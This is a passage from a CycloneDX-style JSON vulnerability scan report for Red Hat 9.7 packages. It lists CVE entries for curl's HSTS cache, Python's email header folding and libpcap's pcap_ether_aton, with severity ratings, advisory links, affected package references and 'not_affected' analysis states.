          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2024-9681",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        697
      ],
      "description": "When curl is asked to use HSTS, the expiry time for a subdomain might\noverwrite a parent domain's cache entry, making it end sooner or later than\notherwise intended.\n\nThis affects curl using applications that enable HSTS and use URLs with the\ninsecure `HTTP://` scheme and perform transfers with hosts like\n`x.example.com` as well as `example.com` where the first host is a subdomain\nof the second host.\n\n(The HSTS cache either needs to have been populated manually or there needs to\nhave been previous HTTPS accesses done as the cache needs to have entries for\nthe domains involved to trigger this problem.)\n\nWhen `x.example.com` responds with `Strict-Transport-Security:` headers, this\nbug can make the subdomain's expiry timeout *bleed over* and get set for the\nparent domain `example.com` in curl's HSTS cache.\n\nThe result of a triggered bug is that HTTP accesses to `example.com` get\nconverted to HTTPS for a different period of time than what was asked for by\nthe origin server. If `example.com` for example stops supporting HTTPS at its\nexpiry time, curl might then fail to access `http://example.com` until the\n(wrongly set) timeout expires. This bug can also expire the parent's entry\n*earlier*, thus making curl inadvertently switch back to insecure HTTP earlier\nthan otherwise intended.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-9681"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/12"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/13"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/4"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/5"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/8"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/9"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/11/06/2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-9681"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-9681.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-9681.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-g337-g667-mjvw"
        },
        {
          "url": "https://hackerone.com/reports/2764830"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9681"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241213-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241213-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7104-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-9681"
        }
      ],
      "published": "2024-11-06T08:15:03+00:00",
      "updated": "2025-11-03T21:18:48+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-11468",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "When folding a long comment in an email header containing exclusively unfoldable characters, the parenthesis would not be preserved. This could be used for injecting headers into email messages where addresses are user-controlled and not sanitized.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-11468"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-11468"
        },
        {
          "url": "https://github.com/python/cpython/commit/003b8315669b9f08b1010a49071f73f15f818094"
        },
        {
          "url": "https://github.com/python/cpython/commit/17d1490aa97bd6b98a42b1a9b324ead84e7fd8a2"
        },
        {
          "url": "https://github.com/python/cpython/commit/61614a5e5056e4f61ced65008d4576f3df34acb6"
        },
        {
          "url": "https://github.com/python/cpython/commit/a76e4cd62dd68e7cbe86e37e6ed988495a646b66"
        },
        {
          "url": "https://github.com/python/cpython/commit/e9970f077240c7c670e8a6fc6662f2b30d3b6ad0"
        },
        {
          "url": "https://github.com/python/cpython/commit/f738386838021c762efea6c9802c82de65e87796"
        },
        {
          "url": "https://github.com/python/cpython/issues/143935"
        },
        {
          "url": "https://github.com/python/cpython/pull/143936"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/FELSEOLBI2QR6YLG6Q7VYF7FWSGQTKLI/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11468"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-11468"
        }
      ],
      "published": "2026-01-20T22:15:50+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-11961",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 1.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        122,
        126
      ],
      "description": "pcap_ether_aton() is an auxiliary function in libpcap, it takes a string argument and returns a fixed-size allocated buffer.  The string argument must be a well-formed MAC-48 address in one of the supported formats, but this requirement has been poorly documented.  If an application calls the function with an argument that deviates from the expected format, the function can read data beyond the end of the provided string and write data beyond the end of the allocated buffer.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-11961"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-11961"
        },
        {
          "url": "https://github.com/the-tcpdump-group/libpcap/commit/b2d2f9a9a0581c40780bde509f7cc715920f1c02"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11961"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-11961"
        }
      ],
      "published": "2025-12-31T01:15:54+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.7&epoch=14",
          "versions": [
            {
              "version": "14:1.10.0-4.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.7&epoch=14"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-12781",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
